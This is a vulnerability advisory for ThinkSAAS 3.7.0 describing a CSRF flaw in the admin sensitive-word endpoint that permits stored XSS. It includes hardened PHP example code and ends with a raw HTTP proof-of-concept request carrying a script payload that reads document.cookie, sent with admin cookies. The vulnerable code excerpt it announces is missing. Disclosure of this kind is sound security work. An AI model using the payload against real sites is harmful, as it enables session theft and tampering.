Summary
ThinkSAAS 3.7.0 has a stored XSS vulnerability. The request that manages the sensitive-word filter (Backend > Security Center > Sensitive Words) has no CSRF verification. After an administrator clicks a malicious link, the CSRF vulnerability lets an attacker add or delete arbitrary sensitive words, disrupting normal business logic, and also store an XSS payload.
Details
The vulnerable code is in app/system/action/anti.php, in the following part:
In that section of code, the contents of $_POST['word'] are used directly to create a new sensitive word without any filtering or validation, so dangerous content can easily be injected.
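As an added illustration (not ThinkSAAS code; the function names, session keys and storage callback are assumptions), this is how a hardened version of such a handler would reject forged cross-site POSTs with a per-session CSRF token, validate the submitted word, and escape it on output:

```php
<?php
// Added illustration, not ThinkSAAS code. anti_word_add(), the session keys
// and the $store callback are assumptions made for this example.
session_start();

// Per-session CSRF token that the admin form embeds as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a cross-site request cannot read the token,
// so a forged POST fails here before any state changes.
function csrf_check(?string $submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Validate the word itself: non-empty, bounded length, no markup or control chars.
function validate_word(string $word): ?string {
    $word = trim($word);
    if ($word === '' || mb_strlen($word) > 64) {
        return null;
    }
    if (preg_match('/[<>"\'\x00-\x1f]/u', $word)) {
        return null;
    }
    return $word;
}

// Hardened equivalent of the worddo action: method check, CSRF check, validation.
function anti_word_add(array $post, callable $store): array {
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST' || !csrf_check($post['csrf_token'] ?? null)) {
        return ['ok' => false, 'error' => 'CSRF check failed'];
    }
    $word = validate_word((string)($post['word'] ?? ''));
    if ($word === null) {
        return ['ok' => false, 'error' => 'invalid word'];
    }
    $store($word); // in a real application: a parameterized INSERT
    return ['ok' => true, 'word' => $word];
}

// Defense in depth: escape stored words whenever they are rendered in HTML.
function render_word(string $word): string {
    return htmlspecialchars($word, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

Setting the session cookie with SameSite=Lax or Strict further reduces the CSRF exposure, but the token check is what blocks the forged request described above.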
Proof of Concept (POC)
POST /index.php?app=system&ac=anti&ts=worddo HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ts_email=admin%40admin.com; ts_autologin=a21tr9l9wg00w8swgwckks4g0cskw8w; timezone=8; username_c1aa741a=admin; token_c1aa741a=5215abf192a064ccc90d9518304b966ee972689be2ca9d82e4bbd516b3301a6e1712987537; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; http304ok=1
Connection: close
word=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E